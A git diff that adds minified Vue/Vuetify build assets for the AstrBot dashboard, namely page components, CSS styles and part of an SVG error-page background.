import{x as i,o as l,c as _,w as s,a as e,f as a,J as m,V as c,b as t,t as u,ae as p,B as n,af as o,j as f}from"./index-25639696.js";const b={class:"text-h3"},h={class:"d-flex align-center"},g={class:"d-flex align-center"},V=i({__name:"BaseBreadcrumb",props:{title:String,breadcrumbs:Array,icon:String},setup(d){const r=d;return(x,B)=>(l(),_(c,{class:"page-breadcrumb mb-1 mt-1"},{default:s(()=>[e(a,{cols:"12",md:"12"},{default:s(()=>[e(m,{variant:"outlined",elevation:"0",class:"px-4 py-3 withbg"},{default:s(()=>[e(c,{"no-gutters":"",class:"align-center"},{default:s(()=>[e(a,{md:"5"},{default:s(()=>[t("h3",b,u(r.title),1)]),_:1}),e(a,{md:"7",sm:"12",cols:"12"},{default:s(()=>[e(p,{items:r.breadcrumbs,class:"text-h5 justify-md-end pa-1"},{divider:s(()=>[t("div",h,[e(n(o),{size:"17"})])]),prepend:s(()=>[e(f,{size:"small",icon:"mdi-home",class:"text-secondary mr-2"}),t("div",g,[e(n(o),{size:"17"})])]),_:1},8,["items"])]),_:1})]),_:1})]),_:1})]),_:1})]),_:1}))}});export{V as _};
|
||||
1
dashboard/dist/assets/BlankLayout-503500e2.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{x as e,o as a,c as t,w as o,a as s,B as n,Z as r,W as c}from"./index-25639696.js";const f=e({__name:"BlankLayout",setup(p){return(u,_)=>(a(),t(c,null,{default:o(()=>[s(n(r))]),_:1}))}});export{f as default};
|
||||
1
dashboard/dist/assets/ColorPage-55364acc.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as m}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as p,D as a,o as r,s,a as e,w as t,f as o,V as i,F as n,u as g,c as h,a0 as b,e as x,t as y}from"./index-25639696.js";const P=p({__name:"ColorPage",setup(C){const c=a({title:"Colors Page"}),d=a([{title:"Utilities",disabled:!1,href:"#"},{title:"Colors",disabled:!0,href:"#"}]),u=a(["primary","lightprimary","secondary","lightsecondary","info","success","accent","warning","error","darkText","lightText","borderLight","inputBorder","containerBg"]);return(V,k)=>(r(),s(n,null,[e(m,{title:c.value.title,breadcrumbs:d.value},null,8,["title","breadcrumbs"]),e(i,null,{default:t(()=>[e(o,{cols:"12",md:"12"},{default:t(()=>[e(_,{title:"Color Palette"},{default:t(()=>[e(i,null,{default:t(()=>[(r(!0),s(n,null,g(u.value,(l,f)=>(r(),h(o,{md:"3",cols:"12",key:f},{default:t(()=>[e(b,{rounded:"md",class:"align-center justify-center d-flex",height:"100",width:"100%",color:l},{default:t(()=>[x("class: "+y(l),1)]),_:2},1032,["color"])]),_:2},1024))),128))]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{P as default};
|
||||
1
dashboard/dist/assets/ConfigDetailCard-0eb16275.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{o as l,s as o,u as c,c as n,w as u,Q as g,b as d,R as k,F as t,ac as h,O as p,t as m,a as V,ad as f,i as C,q as x,k as v,A as U}from"./index-25639696.js";import{_ as w}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";const S={__name:"ConfigDetailCard",props:{config:Array},setup(s){return(y,B)=>(l(!0),o(t,null,c(s.config,r=>(l(),n(w,{key:r.name,title:r.name,style:{"margin-bottom":"16px"}},{default:u(()=>[g(d("a",null,"No data",512),[[k,s.config.length===0]]),(l(!0),o(t,null,c(r.body,e=>(l(),o(t,null,[e.config_type==="item"?(l(),o(t,{key:0},[e.val_type==="bool"?(l(),n(h,{key:0,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,color:"primary",inset:""},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="str"?(l(),n(p,{key:1,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,style:{"margin-bottom":"8px"},variant:"outlined"},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="int"?(l(),n(p,{key:2,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,style:{"margin-bottom":"8px"},variant:"outlined"},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="list"?(l(),o(t,{key:3},[d("span",null,m(e.name),1),V(f,{modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,chips:"",clearable:"",label:"请添加",multiple:"","prepend-icon":"mdi-tag-multiple-outline"},{selection:u(({attrs:a,item:i,select:b,selected:_})=>[V(C,x(a,{"model-value":_,closable:"",onClick:b,"onClick:close":D=>y.remove(i)}),{default:u(()=>[d("strong",null,m(i),1)]),_:2},1040,["model-value","onClick","onClick:close"])]),_:2},1032,["modelValue","onUpdate:modelValue"])],64)):v("",!0)],64)):e.config_type==="divider"?(l(),n(U,{key:1,style:{"margin-top":"8px","margin-bottom":"8px"}})):v("",!0)],64))),256))]),_:2},1032,["title"]))),128))}};export{S as _};
|
||||
1
dashboard/dist/assets/ConfigPage-8225b5ca.js
vendored
Normal file
1
dashboard/dist/assets/ConfigPage-f564cc69.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.v-tab{text-transform:none!important}
|
||||
11
dashboard/dist/assets/ConsolePage-e3d6951b.js
vendored
Normal file
32
dashboard/dist/assets/ConsolePage-ff373be6.css
vendored
Normal file
@@ -0,0 +1,32 @@
|
||||
/**
|
||||
* Copyright (c) 2014 The xterm.js authors. All rights reserved.
|
||||
* Copyright (c) 2012-2013, Christopher Jeffrey (MIT License)
|
||||
* https://github.com/chjj/term.js
|
||||
* @license MIT
|
||||
*
|
||||
* Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
* of this software and associated documentation files (the "Software"), to deal
|
||||
* in the Software without restriction, including without limitation the rights
|
||||
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
* copies of the Software, and to permit persons to whom the Software is
|
||||
* furnished to do so, subject to the following conditions:
|
||||
*
|
||||
* The above copyright notice and this permission notice shall be included in
|
||||
* all copies or substantial portions of the Software.
|
||||
*
|
||||
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||
* THE SOFTWARE.
|
||||
*
|
||||
* Originally forked from (with the author's permission):
|
||||
* Fabrice Bellard's javascript vt100 for jslinux:
|
||||
* http://bellard.org/jslinux/
|
||||
* Copyright (c) 2011 Fabrice Bellard
|
||||
* The original design remains. The terminal itself
|
||||
* has been extended to include xterm CSI codes, among
|
||||
* other features.
|
||||
*/.xterm{cursor:text;position:relative;user-select:none;-ms-user-select:none;-webkit-user-select:none}.xterm.focus,.xterm:focus{outline:none}.xterm .xterm-helpers{position:absolute;top:0;z-index:5}.xterm .xterm-helper-textarea{padding:0;border:0;margin:0;position:absolute;opacity:0;left:-9999em;top:0;width:0;height:0;z-index:-5;white-space:nowrap;overflow:hidden;resize:none}.xterm .composition-view{background:#000;color:#fff;display:none;position:absolute;white-space:nowrap;z-index:1}.xterm .composition-view.active{display:block}.xterm .xterm-viewport{background-color:#000;overflow-y:scroll;cursor:default;position:absolute;right:0;left:0;top:0;bottom:0}.xterm .xterm-screen{position:relative}.xterm .xterm-screen canvas{position:absolute;left:0;top:0}.xterm .xterm-scroll-area{visibility:hidden}.xterm-char-measure-element{display:inline-block;visibility:hidden;position:absolute;top:0;left:-9999em;line-height:normal}.xterm.enable-mouse-events{cursor:default}.xterm.xterm-cursor-pointer,.xterm .xterm-cursor-pointer{cursor:pointer}.xterm.column-select.focus{cursor:crosshair}.xterm .xterm-accessibility,.xterm .xterm-message{position:absolute;left:0;top:0;bottom:0;right:0;z-index:10;color:transparent;pointer-events:none}.xterm .live-region{position:absolute;left:-9999px;width:1px;height:1px;overflow:hidden}.xterm-dim{opacity:1!important}.xterm-underline-1{text-decoration:underline}.xterm-underline-2{text-decoration:double underline}.xterm-underline-3{text-decoration:wavy underline}.xterm-underline-4{text-decoration:dotted underline}.xterm-underline-5{text-decoration:dashed underline}.xterm-overline{text-decoration:overline}.xterm-overline.xterm-underline-1{text-decoration:overline underline}.xterm-overline.xterm-underline-2{text-decoration:overline double underline}.xterm-overline.xterm-underline-3{text-decoration:overline wavy underline}.xterm-overline.xterm-underline-4{text-decoration:overline dotted underline}.xterm-overline.xterm-underline-5{text-decoration:overline dashed underline}.xterm-strikethrough{text-decoration:line-through}.xterm-screen .xterm-decoration-container .xterm-decoration{z-index:6;position:absolute}.xterm-screen .xterm-decoration-container .xterm-decoration.xterm-decoration-top-layer{z-index:7}.xterm-decoration-overview-ruler{z-index:8;position:absolute;top:0;right:0;pointer-events:none}.xterm-decoration-top{z-index:2;position:relative}
|
||||
1
dashboard/dist/assets/DefaultDashboard-ece65639.js
vendored
Normal file
1
dashboard/dist/assets/Error404Page-11cf087a.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.CardMediaWrapper{max-width:720px;margin:0 auto;position:relative}.CardMediaBuild{position:absolute;top:0;left:0;width:100%;animation:5s bounce ease-in-out infinite}.CardMediaParts{position:absolute;top:0;left:0;width:100%;animation:10s blink ease-in-out infinite}
|
||||
1
dashboard/dist/assets/Error404Page-5b9b1a3e.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as t}from"./_plugin-vue_export-helper-c27b6911.js";import{o,c,w as s,V as i,a as r,b as e,d as l,e as a,f as d}from"./index-25639696.js";const n="/assets/img-error-bg-ab6474a0.svg",_="/assets/img-error-blue-2675a7a9.svg",m="/assets/img-error-text-a6aebfa0.svg",g="/assets/img-error-purple-edee3fbc.svg";const p={},u={class:"text-center"},f=e("div",{class:"CardMediaWrapper"},[e("img",{src:n,alt:"grid",class:"w-100"}),e("img",{src:_,alt:"grid",class:"CardMediaParts"}),e("img",{src:m,alt:"build",class:"CardMediaBuild"}),e("img",{src:g,alt:"build",class:"CardMediaBuild"})],-1),h=e("h1",{class:"text-h1"},"Something is wrong",-1),v=e("p",null,[e("small",null,[a("The page you are looking was moved, removed, "),e("br"),a("renamed, or might never exist! ")])],-1);function x(b,V){return o(),c(i,{"no-gutters":"",class:"h-100vh"},{default:s(()=>[r(d,{class:"d-flex align-center justify-center"},{default:s(()=>[e("div",u,[f,h,v,r(l,{variant:"flat",color:"primary",class:"mt-4",to:"/","prepend-icon":"mdi-home"},{default:s(()=>[a(" Home")]),_:1})])]),_:1})]),_:1})}const C=t(p,[["render",x]]);export{C as default};
|
||||
1
dashboard/dist/assets/ExtensionPage-0c929f20.js
vendored
Normal file
1
dashboard/dist/assets/FullLayout-18d94e89.js
vendored
Normal file
5
dashboard/dist/assets/LoginPage-2bd5ea03.js
vendored
Normal file
1
dashboard/dist/assets/LoginPage-74e85ca7.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.custom-devider{border-color:#00000014!important}.googleBtn{border-color:#00000014;margin:30px 0 20px}.outlinedInput .v-field{border:1px solid rgba(0,0,0,.08);box-shadow:none}.orbtn{padding:2px 40px;border-color:#00000014;margin:20px 15px}.pwdInput{position:relative}.pwdInput .v-input__append{position:absolute;right:10px;top:50%;transform:translateY(-50%)}.loginForm .v-text-field .v-field--active input{font-weight:500}.loginBox{max-width:475px;margin:0 auto}
|
||||
1
dashboard/dist/assets/LogoDark.vue_vue_type_script_setup_true_lang-b1d2f1af.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{aw as _,x as d,D as n,o as c,s as m,a as f,w as p,Q as r,b as a,R as o,B as t,ax as h}from"./index-25639696.js";const s={Sidebar_drawer:!0,Customizer_drawer:!1,mini_sidebar:!1,fontTheme:"Roboto",inputBg:!1},l=_({id:"customizer",state:()=>({Sidebar_drawer:s.Sidebar_drawer,Customizer_drawer:s.Customizer_drawer,mini_sidebar:s.mini_sidebar,fontTheme:"Poppins",inputBg:s.inputBg}),getters:{},actions:{SET_SIDEBAR_DRAWER(){this.Sidebar_drawer=!this.Sidebar_drawer},SET_MINI_SIDEBAR(e){this.mini_sidebar=e},SET_FONT(e){this.fontTheme=e}}}),u={class:"logo",style:{display:"flex","align-items":"center"}},b={style:{"font-size":"24px","font-weight":"1000"}},w={style:{"font-size":"20px","font-weight":"1000"}},S={style:{"font-size":"20px"}},z=d({__name:"LogoDark",setup(e){n("rgb(var(--v-theme-primary))"),n("rgb(var(--v-theme-secondary))");const i=l();return(g,B)=>(c(),m("div",u,[f(t(h),{to:"/",style:{"text-decoration":"none",color:"black"}},{default:p(()=>[r(a("span",b,"AstrBot 仪表盘",512),[[o,!t(i).mini_sidebar]]),r(a("span",w,"Astr",512),[[o,t(i).mini_sidebar]]),r(a("span",S,"Bot",512),[[o,t(i).mini_sidebar]])]),_:1})]))}});export{z as _,l as u};
|
||||
1
dashboard/dist/assets/MaterialIcons-69a5e9aa.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as o}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_ as i}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as n,D as a,o as c,s as m,a as e,w as t,f as d,b as f,V as _,F as u}from"./index-25639696.js";const p=["innerHTML"],v=n({__name:"MaterialIcons",setup(b){const s=a({title:"Material Icons"}),r=a('<iframe src="https://materialdesignicons.com/" frameborder="0" width="100%" height="1000"></iframe>'),l=a([{title:"Icons",disabled:!1,href:"#"},{title:"Material Icons",disabled:!0,href:"#"}]);return(h,M)=>(c(),m(u,null,[e(o,{title:s.value.title,breadcrumbs:l.value},null,8,["title","breadcrumbs"]),e(_,null,{default:t(()=>[e(d,{cols:"12",md:"12"},{default:t(()=>[e(i,{title:"Material Icons"},{default:t(()=>[f("div",{innerHTML:r.value},null,8,p)]),_:1})]),_:1})]),_:1})],64))}});export{v as default};
|
||||
1
dashboard/dist/assets/RegisterPage-799ed804.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.custom-devider{border-color:#00000014!important}.googleBtn{border-color:#00000014;margin:30px 0 20px}.outlinedInput .v-field{border:1px solid rgba(0,0,0,.08);box-shadow:none}.orbtn{padding:2px 40px;border-color:#00000014;margin:20px 15px}.pwdInput{position:relative}.pwdInput .v-input__append{position:absolute;right:10px;top:50%;transform:translateY(-50%)}.loginBox{max-width:475px;margin:0 auto}
|
||||
1
dashboard/dist/assets/RegisterPage-b4e7e679.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as B}from"./LogoDark.vue_vue_type_script_setup_true_lang-b1d2f1af.js";import{x as y,D as o,o as b,s as U,a as e,w as a,b as n,B as $,d as u,f as d,A as _,e as f,V as r,O as m,aq as q,av as A,F as E,c as F,N as T,J as V,L as P}from"./index-25639696.js";const z="/assets/social-google-a359a253.svg",N=["src"],S=n("span",{class:"ml-2"},"Sign up with Google",-1),D=n("h5",{class:"text-h5 text-center my-4 mb-8"},"Sign up with Email address",-1),G={class:"d-sm-inline-flex align-center mt-2 mb-7 mb-sm-0 font-weight-bold"},L=n("a",{href:"#",class:"ml-1 text-lightText"},"Terms and Condition",-1),O={class:"mt-5 text-right"},j=y({__name:"AuthRegister",setup(w){const c=o(!1),i=o(!1),p=o(""),v=o(""),g=o(),h=o(""),x=o(""),k=o([s=>!!s||"Password is required",s=>s&&s.length<=10||"Password must be less than 10 characters"]),C=o([s=>!!s||"E-mail is required",s=>/.+@.+\..+/.test(s)||"E-mail must be valid"]);function R(){g.value.validate()}return(s,l)=>(b(),U(E,null,[e(u,{block:"",color:"primary",variant:"outlined",class:"text-lightText googleBtn"},{default:a(()=>[n("img",{src:$(z),alt:"google"},null,8,N),S]),_:1}),e(r,null,{default:a(()=>[e(d,{class:"d-flex align-center"},{default:a(()=>[e(_,{class:"custom-devider"}),e(u,{variant:"outlined",class:"orbtn",rounded:"md",size:"small"},{default:a(()=>[f("OR")]),_:1}),e(_,{class:"custom-devider"})]),_:1})]),_:1}),D,e(A,{ref_key:"Regform",ref:g,"lazy-validation":"",action:"/dashboards/analytical",class:"mt-7 loginForm"},{default:a(()=>[e(r,null,{default:a(()=>[e(d,{cols:"12",sm:"6"},{default:a(()=>[e(m,{modelValue:h.value,"onUpdate:modelValue":l[0]||(l[0]=t=>h.value=t),density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary",label:"Firstname"},null,8,["modelValue"])]),_:1}),e(d,{cols:"12",sm:"6"},{default:a(()=>[e(m,{modelValue:x.value,"onUpdate:modelValue":l[1]||(l[1]=t=>x.value=t),density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary",label:"Lastname"},null,8,["modelValue"])]),_:1})]),_:1}),e(m,{modelValue:v.value,"onUpdate:modelValue":l[2]||(l[2]=t=>v.value=t),rules:C.value,label:"Email Address / Username",class:"mt-4 mb-4",required:"",density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary"},null,8,["modelValue","rules"]),e(m,{modelValue:p.value,"onUpdate:modelValue":l[3]||(l[3]=t=>p.value=t),rules:k.value,label:"Password",required:"",density:"comfortable",variant:"outlined",color:"primary","hide-details":"auto","append-icon":i.value?"mdi-eye":"mdi-eye-off",type:i.value?"text":"password","onClick:append":l[4]||(l[4]=t=>i.value=!i.value),class:"pwdInput"},null,8,["modelValue","rules","append-icon","type"]),n("div",G,[e(q,{modelValue:c.value,"onUpdate:modelValue":l[5]||(l[5]=t=>c.value=t),rules:[t=>!!t||"You must agree to continue!"],label:"Agree with?",required:"",color:"primary",class:"ms-n2","hide-details":""},null,8,["modelValue","rules"]),L]),e(u,{color:"secondary",block:"",class:"mt-2",variant:"flat",size:"large",onClick:l[6]||(l[6]=t=>R())},{default:a(()=>[f("Sign Up")]),_:1})]),_:1},512),n("div",O,[e(_),e(u,{variant:"plain",to:"/auth/login",class:"mt-2 text-capitalize mr-n2"},{default:a(()=>[f("Already have an account?")]),_:1})])],64))}});const I={class:"pa-7 pa-sm-12"},J=n("h2",{class:"text-secondary text-h2 mt-8"},"Sign up",-1),Y=n("h4",{class:"text-disabled text-h4 mt-3"},"Enter credentials to continue",-1),M=y({__name:"RegisterPage",setup(w){return(c,i)=>(b(),F(r,{class:"h-100vh","no-gutters":""},{default:a(()=>[e(d,{cols:"12",class:"d-flex align-center bg-lightprimary"},{default:a(()=>[e(T,null,{default:a(()=>[n("div",I,[e(r,{justify:"center"},{default:a(()=>[e(d,{cols:"12",lg:"10",xl:"6",md:"7"},{default:a(()=>[e(V,{elevation:"0",class:"loginBox"},{default:a(()=>[e(V,{variant:"outlined"},{default:a(()=>[e(P,{class:"pa-9"},{default:a(()=>[e(r,null,{default:a(()=>[e(d,{cols:"12",class:"text-center"},{default:a(()=>[e(B),J,Y]),_:1})]),_:1}),e(j)]),_:1})]),_:1})]),_:1})]),_:1})]),_:1})])]),_:1})]),_:1})]),_:1}))}});export{M as default};
|
||||
1
dashboard/dist/assets/ShadowPage-e7fd39fc.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as c}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_ as f}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as m,D as s,o as l,s as r,a as e,w as a,f as i,V as o,F as d,u as _,J as p,X as b,b as h,t as g}from"./index-25639696.js";const v=m({__name:"ShadowPage",setup(w){const n=s({title:"Shadow Page"}),u=s([{title:"Utilities",disabled:!1,href:"#"},{title:"Shadow",disabled:!0,href:"#"}]);return(V,x)=>(l(),r(d,null,[e(c,{title:n.value.title,breadcrumbs:u.value},null,8,["title","breadcrumbs"]),e(o,null,{default:a(()=>[e(i,{cols:"12",md:"12"},{default:a(()=>[e(f,{title:"Basic Shadow"},{default:a(()=>[e(o,{justify:"center"},{default:a(()=>[(l(),r(d,null,_(25,t=>e(i,{key:t,cols:"auto"},{default:a(()=>[e(p,{height:"100",width:"100",class:b(["mb-5",["d-flex justify-center align-center bg-primary",`elevation-${t}`]])},{default:a(()=>[h("div",null,g(t-1),1)]),_:2},1032,["class"])]),_:2},1024)),64))]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{v as default};
|
||||
1
dashboard/dist/assets/TablerIcons-eef884dc.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as o}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_ as n}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as c,D as a,o as i,s as m,a as e,w as t,f as d,b as f,V as _,F as u}from"./index-25639696.js";const b=["innerHTML"],w=c({__name:"TablerIcons",setup(p){const s=a({title:"Tabler Icons"}),r=a('<iframe src="https://tablericons.com/" frameborder="0" width="100%" height="600"></iframe>'),l=a([{title:"Icons",disabled:!1,href:"#"},{title:"Tabler Icons",disabled:!0,href:"#"}]);return(h,T)=>(i(),m(u,null,[e(o,{title:s.value.title,breadcrumbs:l.value},null,8,["title","breadcrumbs"]),e(_,null,{default:t(()=>[e(d,{cols:"12",md:"12"},{default:t(()=>[e(n,{title:"Tabler Icons"},{default:t(()=>[f("div",{innerHTML:r.value},null,8,b)]),_:1})]),_:1})]),_:1})],64))}});export{w as default};
|
||||
1
dashboard/dist/assets/TypographyPage-e6311caa.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as m}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_ as v}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as f,o as i,c as g,w as e,a,a8 as y,K as b,e as w,t as d,A as C,L as V,a9 as L,J as _,D as o,s as h,f as k,b as t,F as x,u as B,X as H,V as T}from"./index-25639696.js";const s=f({__name:"UiChildCard",props:{title:String},setup(r){const l=r;return(n,c)=>(i(),g(_,{variant:"outlined"},{default:e(()=>[a(y,{class:"py-3"},{default:e(()=>[a(b,{class:"text-h5"},{default:e(()=>[w(d(l.title),1)]),_:1})]),_:1}),a(C),a(V,null,{default:e(()=>[L(n.$slots,"default")]),_:3})]),_:3}))}}),D={class:"d-flex flex-column gap-1"},S={class:"text-caption pa-2 bg-lightprimary"},z=t("div",{class:"text-grey"},"Class",-1),N={class:"font-weight-medium"},$=t("div",null,[t("p",{class:"text-left"},"Left aligned on all viewport sizes."),t("p",{class:"text-center"},"Center aligned on all viewport sizes."),t("p",{class:"text-right"},"Right aligned on all viewport sizes."),t("p",{class:"text-sm-left"},"Left aligned on viewports SM (small) or wider."),t("p",{class:"text-right text-md-left"},"Left aligned on viewports MD (medium) or wider."),t("p",{class:"text-right text-lg-left"},"Left aligned on viewports LG (large) or wider."),t("p",{class:"text-right text-xl-left"},"Left aligned on viewports XL (extra-large) or wider.")],-1),M=t("div",{class:"d-flex justify-space-between flex-row"},[t("a",{href:"#",class:"text-decoration-none"},"Non-underlined link"),t("div",{class:"text-decoration-line-through"},"Line-through text"),t("div",{class:"text-decoration-overline"},"Overline text"),t("div",{class:"text-decoration-underline"},"Underline text")],-1),O=t("div",null,[t("p",{class:"text-high-emphasis"},"High-emphasis has an opacity of 87% in light theme and 100% in dark."),t("p",{class:"text-medium-emphasis"},"Medium-emphasis text and hint text have opacities of 60% in light theme and 70% in dark."),t("p",{class:"text-disabled"},"Disabled text has an opacity of 38% in light theme and 50% in dark.")],-1),j=f({__name:"TypographyPage",setup(r){const l=o({title:"Typography Page"}),n=o([["Heading 1","text-h1"],["Heading 2","text-h2"],["Heading 3","text-h3"],["Heading 4","text-h4"],["Heading 5","text-h5"],["Heading 6","text-h6"],["Subtitle 1","text-subtitle-1"],["Subtitle 2","text-subtitle-2"],["Body 1","text-body-1"],["Body 2","text-body-2"],["Button","text-button"],["Caption","text-caption"],["Overline","text-overline"]]),c=o([{title:"Utilities",disabled:!1,href:"#"},{title:"Typography",disabled:!0,href:"#"}]);return(U,F)=>(i(),h(x,null,[a(m,{title:l.value.title,breadcrumbs:c.value},null,8,["title","breadcrumbs"]),a(T,null,{default:e(()=>[a(k,{cols:"12",md:"12"},{default:e(()=>[a(v,{title:"Basic Typography"},{default:e(()=>[a(s,{title:"Heading"},{default:e(()=>[t("div",D,[(i(!0),h(x,null,B(n.value,([p,u])=>(i(),g(_,{variant:"outlined",key:p,class:"my-4"},{default:e(()=>[t("div",{class:H([u,"pa-2"])},d(p),3),t("div",S,[z,t("div",N,d(u),1)])]),_:2},1024))),128))])]),_:1}),a(s,{title:"Text-alignment",class:"mt-8"},{default:e(()=>[$]),_:1}),a(s,{title:"Decoration",class:"mt-8"},{default:e(()=>[M]),_:1}),a(s,{title:"Opacity",class:"mt-8"},{default:e(()=>[O]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{j as default};
|
||||
1
dashboard/dist/assets/UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{x as n,o,c as i,w as e,a,a8 as d,b as c,K as u,e as p,t as _,a9 as s,A as f,L as V,J as m}from"./index-25639696.js";const C={class:"d-sm-flex align-center justify-space-between"},h=n({__name:"UiParentCard",props:{title:String},setup(l){const r=l;return(t,x)=>(o(),i(m,{variant:"outlined",elevation:"0",class:"withbg"},{default:e(()=>[a(d,null,{default:e(()=>[c("div",C,[a(u,null,{default:e(()=>[p(_(r.title),1)]),_:1}),s(t.$slots,"action")])]),_:3}),a(f),a(V,null,{default:e(()=>[s(t.$slots,"default")]),_:3})]),_:3}))}});export{h as _};
|
||||
1
dashboard/dist/assets/_plugin-vue_export-helper-c27b6911.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
const s=(t,r)=>{const o=t.__vccOpts||t;for(const[c,e]of r)o[c]=e;return o};export{s as _};
|
||||
34
dashboard/dist/assets/img-error-bg-ab6474a0.svg
vendored
Normal file
@@ -0,0 +1,34 @@
|
||||
<svg width="676" height="391" viewBox="0 0 676 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<g opacity="0.09">
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 4.49127 197.53)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 342.315 387.578)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 28.0057 211.105)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 365.829 374.002)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 51.52 224.68)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 389.344 360.428)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 75.0345 238.255)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 412.858 346.852)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 98.5488 251.83)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 436.372 333.277)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 122.063 265.405)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 459.887 319.703)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 145.578 278.979)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 483.401 306.127)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 169.092 292.556)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 506.916 292.551)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 192.597 306.127)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 530.43 278.977)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 216.111 319.703)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 553.944 265.402)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 239.626 333.277)" stroke="black"/>
|
||||
